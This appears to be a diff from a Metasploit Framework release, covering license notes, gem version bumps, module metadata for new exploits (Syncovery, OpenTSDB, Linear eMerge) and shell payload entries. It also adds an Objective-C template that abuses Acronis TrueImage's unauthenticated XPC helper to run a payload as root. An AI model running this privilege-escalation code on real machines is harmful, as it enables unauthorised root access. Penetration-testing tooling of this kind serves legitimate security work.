+Purpose: This module allows us to create an x64 Windows messagebox payload.

-Files: lib/msf/core/web_services/public/*, lib/msf/core/web_services/views/api_docs.erb
-Copyright: Copyright 2018 SmartBear Software
-License: Apache 2.0
+Files: modules/post/linux/dos/xen_420_dos.rb
+Copyright: 2016
+License: GPL
+Purpose: This module crashes the Xen 4.2.0 hypervisor when run in a 
+         paravirtualized VM. It contains a short code section licensed through
+         GPL.

-Files: data/jtr/*
-Copyright: Copyright 1996-2013 by Solar Designer
-License: GNU GPL 2.0
-
-Files: external/source/exploits/drunkpotato/Common_Src_Files/spnegotokenhandler/*
-Copyright: 2011 Jon Bringhurst
-License: GNU GPL 2.0
-
-Files: external/source/evasion/windows/process_herpaderping/ProcessHerpaderping/*
-Copyright: 2020 Johnny Shaw
-License: MIT
-
-Files: exteneral/source/exploits/CVE-2022-26904/*
-Copywrite: 2022 Abdelhamid Naceri
-License: MIT
+Files: tools/exploit/metasm_shell.rb
+Copyright: 2007, Yoann GUILLOT
+License: LGPL
+Purpose: Allows users to invoke an interactive metasm shell to get opcodes from
+assembly instructions.

 License: BSD-2-clause
 Redistribution and use in source and binary forms, with or without modification,
@@ -10,12 +10,12 @@ afm, 0.2.2, MIT
 arel-helpers, 2.14.0, MIT
 ast, 2.4.2, MIT
 aws-eventstream, 1.2.0, "Apache 2.0"
-aws-partitions, 1.663.0, "Apache 2.0"
-aws-sdk-core, 3.168.0, "Apache 2.0"
-aws-sdk-ec2, 1.350.0, "Apache 2.0"
+aws-partitions, 1.671.0, "Apache 2.0"
+aws-sdk-core, 3.168.3, "Apache 2.0"
+aws-sdk-ec2, 1.354.0, "Apache 2.0"
 aws-sdk-iam, 1.73.0, "Apache 2.0"
-aws-sdk-kms, 1.59.0, "Apache 2.0"
-aws-sdk-s3, 1.117.1, "Apache 2.0"
+aws-sdk-kms, 1.60.0, "Apache 2.0"
+aws-sdk-s3, 1.117.2, "Apache 2.0"
 aws-sigv4, 1.5.2, "Apache 2.0"
 bcrypt, 3.1.18, MIT
 bcrypt_pbkdf, 1.1.0, MIT
@@ -25,11 +25,11 @@ builder, 3.2.4, MIT
 bundler, 2.1.4, MIT
 byebug, 11.1.3, "Simplified BSD"
 coderay, 1.1.3, MIT
-concurrent-ruby, 1.0.5, MIT
+concurrent-ruby, 1.1.10, MIT
 cookiejar, 0.3.3, unknown
 crass, 1.0.6, MIT
 daemons, 1.4.1, MIT
-debug, 1.6.3, "ruby, Simplified BSD"
+debug, 1.7.0, "ruby, Simplified BSD"
 diff-lcs, 1.5.0, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.9, "Apache 2.0"
 docile, 1.4.0, MIT
@@ -59,20 +59,20 @@ http_parser.rb, 0.8.0, MIT
 httpclient, 2.8.3, ruby
 i18n, 1.12.0, MIT
 io-console, 0.5.11, "ruby, Simplified BSD"
-irb, 1.4.3, "ruby, Simplified BSD"
-jmespath, 1.6.1, "Apache 2.0"
+irb, 1.6.1, "ruby, Simplified BSD"
+jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.6.2, ruby
+json, 2.6.3, ruby
 little-plugger, 1.1.4, MIT
 logging, 2.3.1, MIT
 loofah, 2.19.0, MIT
 memory_profiler, 1.0.1, MIT
 metasm, 1.0.5, LGPL-2.1
 metasploit-concern, 4.0.5, "New BSD"
-metasploit-credential, 5.0.9, "New BSD"
-metasploit-framework, 6.2.30, "New BSD"
+metasploit-credential, 6.0.1, "New BSD"
+metasploit-framework, 6.2.35, "New BSD"
 metasploit-model, 4.0.6, "New BSD"
-metasploit-payloads, 2.0.101, "3-clause (or ""modified"") BSD"
+metasploit-payloads, 2.0.105, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 5.0.6, "New BSD"
 metasploit_payloads-mettle, 1.0.20, "3-clause (or ""modified"") BSD"
 method_source, 1.0.0, MIT
@@ -84,13 +84,13 @@ multi_json, 1.15.0, MIT
 mustermann, 3.0.0, MIT
 nessus_rest, 0.1.6, MIT
 net-ldap, 0.17.1, MIT
-net-protocol, 0.1.3, "ruby, Simplified BSD"
+net-protocol, 0.2.0, "ruby, Simplified BSD"
 net-smtp, 0.3.3, "ruby, Simplified BSD"
 net-ssh, 7.0.1, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.5.8, MIT
-nokogiri, 1.13.9, MIT
+nokogiri, 1.13.10, MIT
 nori, 2.6.0, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
@@ -98,7 +98,7 @@ openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
 parallel, 1.22.1, MIT
-parser, 3.1.2.1, MIT
+parser, 3.1.3.0, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.1, LGPL-2.1
 pdf-reader, 2.11.0, MIT
@@ -107,9 +107,9 @@ pry, 0.13.1, MIT
 pry-byebug, 3.9.0, MIT
 public_suffix, 5.0.0, MIT
 puma, 6.0.0, "New BSD"
-racc, 1.6.0, "ruby, Simplified BSD"
+racc, 1.6.1, "ruby, Simplified BSD"
 rack, 2.2.4, MIT
-rack-protection, 3.0.3, MIT
+rack-protection, 3.0.4, MIT
 rack-test, 2.0.2, MIT
 rails-dom-testing, 2.0.3, MIT
 rails-html-sanitizer, 1.4.3, MIT
@@ -137,7 +137,7 @@ rex-rop_builder, 0.1.4, "New BSD"
 rex-socket, 0.1.43, "New BSD"
 rex-sslscan, 0.1.8, "New BSD"
 rex-struct2, 0.1.3, "New BSD"
-rex-text, 0.2.46, "New BSD"
+rex-text, 0.2.47, "New BSD"
 rex-zip, 0.1.4, "New BSD"
 rexml, 3.2.5, "Simplified BSD"
 rkelly-remix, 0.0.7, MIT
@@ -149,7 +149,7 @@ rspec-rails, 6.0.1, MIT
 rspec-rerun, 1.1.0, MIT
 rspec-support, 3.12.0, MIT
 rubocop, 1.39.0, MIT
-rubocop-ast, 1.23.0, MIT
+rubocop-ast, 1.24.0, MIT
 ruby-macho, 3.0.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
@@ -162,18 +162,18 @@ sawyer, 0.9.2, MIT
 simplecov, 0.18.2, MIT
 simplecov-html, 0.12.3, MIT
 simpleidn, 0.2.1, MIT
-sinatra, 3.0.3, MIT
+sinatra, 3.0.4, MIT
 sqlite3, 1.5.4, "New BSD"
 sshkey, 2.0.0, MIT
 swagger-blocks, 3.0.0, MIT
 thin, 1.8.1, "GPL-2.0+, ruby"
 thor, 1.2.1, MIT
 tilt, 2.0.11, MIT
-timecop, 0.9.5, MIT
-timeout, 0.3.0, "ruby, Simplified BSD"
+timecop, 0.9.6, MIT
+timeout, 0.3.1, "ruby, Simplified BSD"
 ttfunk, 1.7.0, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 2.0.5, MIT
-tzinfo-data, 1.2022.6, MIT
+tzinfo-data, 1.2022.7, MIT
 unf, 0.1.4, "2-clause BSDL"
 unf_ext, 0.0.8.2, MIT
 unicode-display_width, 2.3.0, MIT
@@ -0,0 +1,46 @@
+#import <Foundation/Foundation.h>
+
+@protocol HelperToolProtocol
+- (void)checkFullDiskAccessWithReply:(void (^)(BOOL))arg1;
+- (void)executeProcess:(NSString *)arg1 arguments:(NSArray *)arg2 caller:(int)arg3 withReply:(void (^)(int))arg4;
+- (void)getProcessIdentifierWithReply:(void (^)(int))arg1;
+@end
+
+
+int main(int argc, char *argv[])
+{
+    NSString *service_name;
+    NSString *payload = @"<%= @payload_path %>";
+    NSArray *arg_array = @[@"-c", payload];
+    NSFileManager *file_manager = [NSFileManager defaultManager];
+
+    NSString *service_name_2020 = @"com.acronis.trueimagehelper";
+    NSString *service_name_2021 = @"com.acronis.helpertool";
+    NSString *helper_path_2020 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2020];
+    NSString *helper_path_2021 = [NSString stringWithFormat:@"/Library/PrivilegedHelperTools/%@", service_name_2021];
+
+    if ([file_manager fileExistsAtPath:helper_path_2020])
+    {
+        service_name = service_name_2020;
+    }
+    else
+    {
+        service_name = service_name_2021;
+    }
+
+    NSXPCConnection *connection = [[NSXPCConnection alloc] initWithMachServiceName:service_name options:0x1000];
+    NSXPCInterface *interface = [NSXPCInterface interfaceWithProtocol:@protocol(HelperToolProtocol)];
+    [connection setRemoteObjectInterface:interface];
+
+    [connection resume];
+
+    id obj = [connection remoteObjectProxyWithErrorHandler:^(NSError *error)
+    {
+        return;
+    }];
+
+    [obj executeProcess:@"<%= sys_shell %>" arguments:arg_array caller:<%= @pid %> withReply:^(int arg)
+    {
+        return;
+    }];
+}
@@ -13412,7 +13412,7 @@
      "smtps"
    ],
    "targets": null,
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/auxiliary/dos/smtp/sendmail_prescan.rb",
    "is_install_path": true,
    "ref_name": "dos/smtp/sendmail_prescan",
@@ -18237,7 +18237,7 @@
      "https"
    ],
    "targets": null,
-    "mod_time": "2022-02-23 16:27:12 +0000",
+    "mod_time": "2023-01-05 10:38:09 +0000",
    "path": "/modules/auxiliary/gather/exchange_proxylogon_collector.rb",
    "is_install_path": true,
    "ref_name": "gather/exchange_proxylogon_collector",
@@ -35224,6 +35224,63 @@
    "session_types": false,
    "needs_cleanup": false
  },
+  "auxiliary_scanner/http/syncovery_linux_token_cve_2022_36536": {
+    "name": "Syncovery For Linux Web-GUI Session Token Brute-Forcer",
+    "fullname": "auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536",
+    "aliases": [
+
+    ],
+    "rank": 300,
+    "disclosure_date": "2022-09-06",
+    "type": "auxiliary",
+    "author": [
+      "Jan Rude"
+    ],
+    "description": "This module attempts to brute-force a valid session token for the Syncovery File Sync & Backup Software Web-GUI\n          by generating all possible tokens, for every second between 'DateTime.now' and the given X day(s).\n          By default today and yesterday (DAYS = 1) will be checked. If a valid session token is found, the module stops.\n          The vulnerability exists, because in Syncovery session tokens are basically just base64(m/d/Y H:M:S) at the time\n          of the login instead of a random token.\n          If a user does not log out (Syncovery v8.x has no logout) session tokens will remain valid until reboot.",
+    "references": [
+      "URL-https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/",
+      "CVE-2022-36536"
+    ],
+    "platform": "Linux",
+    "arch": "",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": null,
+    "mod_time": "2022-12-14 08:59:53 +0000",
+    "path": "/modules/auxiliary/scanner/http/syncovery_linux_token_cve_2022_36536.rb",
+    "is_install_path": true,
+    "ref_name": "scanner/http/syncovery_linux_token_cve_2022_36536",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": false
+  },
  "auxiliary_scanner/http/synology_forget_passwd_user_enum": {
    "name": "Synology Forget Password User Enumeration Scanner",
    "fullname": "auxiliary/scanner/http/synology_forget_passwd_user_enum",
@@ -46275,7 +46332,7 @@
      "microsoft-ds"
    ],
    "targets": null,
-    "mod_time": "2022-10-10 10:58:14 +0000",
+    "mod_time": "2023-01-09 11:23:26 +0000",
    "path": "/modules/auxiliary/scanner/smb/smb_enumshares.rb",
    "is_install_path": true,
    "ref_name": "scanner/smb/smb_enumshares",
@@ -46718,7 +46775,7 @@
      "smtps"
    ],
    "targets": null,
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/auxiliary/scanner/smtp/smtp_relay.rb",
    "is_install_path": true,
    "ref_name": "scanner/smtp/smtp_relay",
@@ -64165,6 +64222,72 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/linear_emerge_unauth_rce_cve_2019_7256": {
+    "name": "Linear eMerge E3-Series Access Controller Command Injection",
+    "fullname": "exploit/linux/http/linear_emerge_unauth_rce_cve_2019_7256",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2019-10-29",
+    "type": "exploit",
+    "author": [
+      "Gjoko Krstic <gjoko@applied-risk.com>",
+      "h00die-gr3y <h00die.gr3y@gmail.com>"
+    ],
+    "description": "This module exploits a command injection vulnerability in the Linear eMerge\n          E3-Series Access Controller. The Linear eMerge E3 versions `1.00-06` and below are vulnerable\n          to unauthenticated command injection in card_scan_decoder.php via the  `No` and `door` HTTP GET parameter.\n          Successful exploitation results in command execution as the `root` user.",
+    "references": [
+      "CVE-2019-7256",
+      "URL-https://applied-risk.com/resources/ar-2019-005",
+      "URL-https://na.niceforyou.com/",
+      "URL-https://attackerkb.com/topics/8WUJkci8N4/cve-2019-7256",
+      "EDB-47649",
+      "PACKETSTORM-155256"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, armle",
+    "rport": 80,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Unix Command",
+      "Linux Dropper"
+    ],
+    "mod_time": "2023-01-04 16:56:16 +0000",
+    "path": "/modules/exploits/linux/http/linear_emerge_unauth_rce_cve_2019_7256.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/linear_emerge_unauth_rce_cve_2019_7256",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "ioc-in-logs",
+        "artifacts-on-disk"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/linksys_apply_cgi": {
    "name": "Linksys WRT54 Access Point apply.cgi Buffer Overflow",
    "fullname": "exploit/linux/http/linksys_apply_cgi",
@@ -66521,6 +66644,68 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_linux/http/opentsdb_yrange_cmd_injection": {
+    "name": "OpenTSDB 2.4.0 unauthenticated command injection",
+    "fullname": "exploit/linux/http/opentsdb_yrange_cmd_injection",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-18",
+    "type": "exploit",
+    "author": [
+      "Shai rod",
+      "Erik Wynter"
+    ],
+    "description": "This module exploits an unauthenticated command injection\n          vulnerability in the yrange parameter in OpenTSDB through\n          2.4.0 (CVE-2020-35476) in order to achieve unauthenticated\n          remote code execution as the root user.\n\n          The module first attempts to obtain the OpenTSDB version via\n          the api. If the version is 2.4.0 or lower, the module\n          performs additional checks to obtain the configured metrics\n          and aggregators. It then randomly selects one metric and one\n          aggregator and uses those to instruct the target server to\n          plot a graph. As part of this request, the yrange parameter is\n          set to the payload, which will then be executed by the target\n          if the latter is vulnerable.\n\n          This module has been successfully tested against OpenTSDB\n          version 2.3.0.",
+    "references": [
+      "CVE-2020-35476",
+      "URL-https://github.com/OpenTSDB/opentsdb/issues/2051"
+    ],
+    "platform": "Linux,Unix",
+    "arch": "cmd, x86, x64",
+    "rport": 4242,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Automatic (Unix In-Memory)",
+      "Automatic (Linux Dropper)"
+    ],
+    "mod_time": "2022-12-23 13:38:16 +0000",
+    "path": "/modules/exploits/linux/http/opentsdb_yrange_cmd_injection.rb",
+    "is_install_path": true,
+    "ref_name": "linux/http/opentsdb_yrange_cmd_injection",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": null
+  },
  "exploit_linux/http/pandora_fms_events_exec": {
    "name": "Pandora FMS Events Remote Command Execution",
    "fullname": "exploit/linux/http/pandora_fms_events_exec",
@@ -78096,7 +78281,7 @@
    "targets": [
      "Linux x86"
    ],
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/exploits/linux/smtp/exim4_dovecot_exec.rb",
    "is_install_path": true,
    "ref_name": "linux/smtp/exim4_dovecot_exec",
@@ -87773,7 +87958,7 @@
      "Windows",
      "Linux"
    ],
-    "mod_time": "2022-03-22 08:55:59 +0000",
+    "mod_time": "2022-12-15 12:51:30 +0000",
    "path": "/modules/exploits/multi/http/log4shell_header_injection.rb",
    "is_install_path": true,
    "ref_name": "multi/http/log4shell_header_injection",
@@ -101684,6 +101869,62 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_osx/local/acronis_trueimage_xpc_privesc": {
+    "name": "Acronis TrueImage XPC Privilege Escalation",
+    "fullname": "exploit/osx/local/acronis_trueimage_xpc_privesc",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2020-11-11",
+    "type": "exploit",
+    "author": [
+      "Csaba Fitzl",
+      "Shelby Pace"
+    ],
+    "description": "Acronis TrueImage versions 2019 update 1 through 2021 update 1\n          are vulnerable to privilege escalation. The `com.acronis.trueimagehelper`\n          helper tool does not perform any validation on connecting clients,\n          which gives arbitrary clients the ability to execute functions provided\n          by the helper tool with `root` privileges.",
+    "references": [
+      "CVE-2020-25736",
+      "URL-https://kb.acronis.com/content/68061",
+      "URL-https://attackerkb.com/topics/a1Yrvagxt5/cve-2020-25736"
+    ],
+    "platform": "OSX",
+    "arch": "x64",
+    "rport": null,
+    "autofilter_ports": [
+
+    ],
+    "autofilter_services": [
+
+    ],
+    "targets": [
+      "Auto"
+    ],
+    "mod_time": "2022-12-13 09:49:59 +0000",
+    "path": "/modules/exploits/osx/local/acronis_trueimage_xpc_privesc.rb",
+    "is_install_path": true,
+    "ref_name": "osx/local/acronis_trueimage_xpc_privesc",
+    "check": true,
+    "post_auth": false,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+        "artifacts-on-disk",
+        "ioc-in-logs"
+      ]
+    },
+    "session_types": [
+      "shell",
+      "meterpreter"
+    ],
+    "needs_cleanup": true
+  },
  "exploit_osx/local/cfprefsd_race_condition": {
    "name": "macOS cfprefsd Arbitrary File Write Local Privilege Escalation",
    "fullname": "exploit/osx/local/cfprefsd_race_condition",
@@ -105046,6 +105287,65 @@
    "session_types": false,
    "needs_cleanup": null
  },
+  "exploit_unix/http/syncovery_linux_rce_2022_36534": {
+    "name": "Syncovery For Linux Web-GUI Authenticated Remote Command Execution",
+    "fullname": "exploit/unix/http/syncovery_linux_rce_2022_36534",
+    "aliases": [
+
+    ],
+    "rank": 600,
+    "disclosure_date": "2022-09-06",
+    "type": "exploit",
+    "author": [
+      "Jan Rude"
+    ],
+    "description": "This module exploits an authenticated command injection vulnerability in the Web GUI of Syncovery File Sync & Backup Software for Linux.\n          Successful exploitation results in remote code execution under the context of the root user.\n\n          Syncovery allows an authenticated user to create jobs, which are executed before/after a profile is run.\n          Jobs can contain arbitrary system commands and will be executed as root.\n          A valid username and password or a session token is needed to exploit the vulnerability.\n          The profile and its log file will be deleted afterwards to disguise the attack.\n\n          The vulnerability is known to work on Linux platforms. All Syncovery versions prior to v9.48j are vulnerable including all versions of branch 8.",
+    "references": [
+      "URL-https://www.mgm-sp.com/en/multiple-vulnerabilities-in-syncovery-for-linux/",
+      "CVE-2022-36534"
+    ],
+    "platform": "Unix",
+    "arch": "cmd",
+    "rport": 8999,
+    "autofilter_ports": [
+      80,
+      8080,
+      443,
+      8000,
+      8888,
+      8880,
+      8008,
+      3000,
+      8443
+    ],
+    "autofilter_services": [
+      "http",
+      "https"
+    ],
+    "targets": [
+      "Syncovery for Linux < 9.48j"
+    ],
+    "mod_time": "2022-12-14 08:38:20 +0000",
+    "path": "/modules/exploits/unix/http/syncovery_linux_rce_2022_36534.rb",
+    "is_install_path": true,
+    "ref_name": "unix/http/syncovery_linux_rce_2022_36534",
+    "check": true,
+    "post_auth": true,
+    "default_credential": false,
+    "notes": {
+      "Stability": [
+        "crash-safe"
+      ],
+      "Reliability": [
+        "repeatable-session"
+      ],
+      "SideEffects": [
+
+      ]
+    },
+    "session_types": false,
+    "needs_cleanup": true
+  },
  "exploit_unix/http/tnftp_savefile": {
    "name": "tnftp \"savefile\" Arbitrary Command Execution",
    "fullname": "exploit/unix/http/tnftp_savefile",
@@ -106024,7 +106324,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2022-02-14 09:01:05 +0000",
+    "mod_time": "2023-01-04 14:45:58 +0000",
    "path": "/modules/exploits/unix/smtp/exim4_string_format.rb",
    "is_install_path": true,
    "ref_name": "unix/smtp/exim4_string_format",
@@ -152538,7 +152838,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_dotnet_profiler.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_dotnet_profiler",
@@ -152770,7 +153070,7 @@
    "targets": [
      "Windows x64"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_sdclt.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_sdclt",
@@ -153009,7 +153309,7 @@
    "targets": [
      "Automatic"
    ],
-    "mod_time": "2021-10-06 13:43:31 +0000",
+    "mod_time": "2022-12-12 16:53:34 +0000",
    "path": "/modules/exploits/windows/local/bypassuac_windows_store_reg.rb",
    "is_install_path": true,
    "ref_name": "windows/local/bypassuac_windows_store_reg",
@@ -156752,7 +157052,7 @@
    "targets": [
      "Windows"
    ],
-    "mod_time": "2022-04-21 15:33:42 +0000",
+    "mod_time": "2022-12-09 11:24:16 +0000",
    "path": "/modules/exploits/windows/local/s4u_persistence.rb",
    "is_install_path": true,
    "ref_name": "windows/local/s4u_persistence",
@@ -172232,7 +172532,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_busybox_telnetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_busybox_telnetd",
@@ -172266,7 +172566,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_inetd.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_inetd",
@@ -172303,7 +172603,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_jjs.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_jjs",
@@ -172337,7 +172637,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_lua.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_lua",
@@ -172373,7 +172673,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat",
@@ -172407,7 +172707,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping",
@@ -172441,7 +172741,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_netcat_gaping_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_netcat_gaping_ipv6",
@@ -172510,7 +172810,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl",
@@ -172545,7 +172845,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_perl_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_perl_ipv6",
@@ -172579,7 +172879,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_r.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_r",
@@ -172613,7 +172913,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby",
@@ -172647,7 +172947,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_ruby_ipv6.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_ruby_ipv6",
@@ -172681,7 +172981,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_socat_udp.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_socat_udp",
@@ -172750,7 +173050,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/bind_zsh.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/bind_zsh",
@@ -172852,7 +173152,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/pingback_bind.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/pingback_bind",
@@ -172886,7 +173186,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/pingback_reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/pingback_reverse",
@@ -173508,7 +173808,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse",
@@ -173578,7 +173878,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash",
@@ -173612,7 +173912,7 @@
    "autofilter_ports": null,
    "autofilter_services": null,
    "targets": null,
-    "mod_time": "2022-11-04 00:33:03 +0000",
+    "mod_time": "2022-11-22 05:49:48 +0000",
    "path": "/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb",
    "is_install_path": true,
    "ref_name": "cmd/unix/reverse_bash_telnet_ssl",
@@ -173637,7 +173937,7 @@
      "hdm <x@hdm.io>",
      "bcoles <bcoles@gmail.com>"
    ],
-    "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n        This will not work on circa 2009 and older Debian-based Linux\n        distributions (including Ubuntu) because they compile bash\n        without the /dev/udp feature.",
+    "description": "Creates an interactive shell via bash's builtin /dev/udp.\n\n          This will not work on circa 2009 and older Debian-based Linux\n          distributions (including Ubuntu) because they compile bash\n          without the /dev/udp feature.",
    "references": [

    ],
@@ -173647,7 +173947,7 @@
    "autofilter_ports": null,
